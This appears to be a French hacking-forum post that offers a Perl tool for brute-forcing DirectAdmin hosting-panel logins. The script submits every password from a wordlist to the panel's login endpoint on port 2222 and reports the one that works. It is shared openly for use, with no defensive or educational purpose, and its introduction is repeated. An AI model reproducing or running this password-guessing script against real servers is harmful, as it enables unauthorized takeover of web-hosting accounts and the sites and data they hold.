Voici un petit tool permetant de cracker des login directadmin via une passlist
Pour info , DirectAdmin est un Gestionaire de hosting comme un Cpanel , qui utilise le port 2222 par default .
Petit screen dun panel DirectAdmin :
Maintenant , voila le tool :
Pour info , DirectAdmin est un Gestionaire de hosting comme un Cpanel , qui utilise le port 2222 par default .
Petit screen dun panel DirectAdmin :
Maintenant , voila le tool :
Code:
#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request; print q( ======================================================== # directadmin brute forcer perl (priv8) ======================================================== ); my $host = $ARGV[0]; my $port = $ARGV[1]; my $user = $ARGV[2]; my $list = $ARGV[3]; die " usage : perl $0 [host] [user][list] \n - \n Ex : perl $0 http://localhost/ 2222 direct pass.txt\n" unless $ARGV[3]; if($host !~ /http:\/\//) { $host = "http://$host"; } my $useragaint = new LWP::UserAgent; open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @LISTS = <PASSFILE>; close PASSFILE; foreach my $L (@LISTS) { chomp $L; $pwd = $L; my $response = $useragaint->post($host.":".$port."/CMD_LOGIN", { "username" => "$user", "password" => "$pwd", }); if ($content = $response->content=~ /<h1>Invalid login. Please verify your Username and Password<\/h1>/) { print "[-] password : $pwd Is Incorrect . \n"; } else { print "\n\n[+] PASSWORD FOUND : $pwd\n"; exit() } }
Commentaire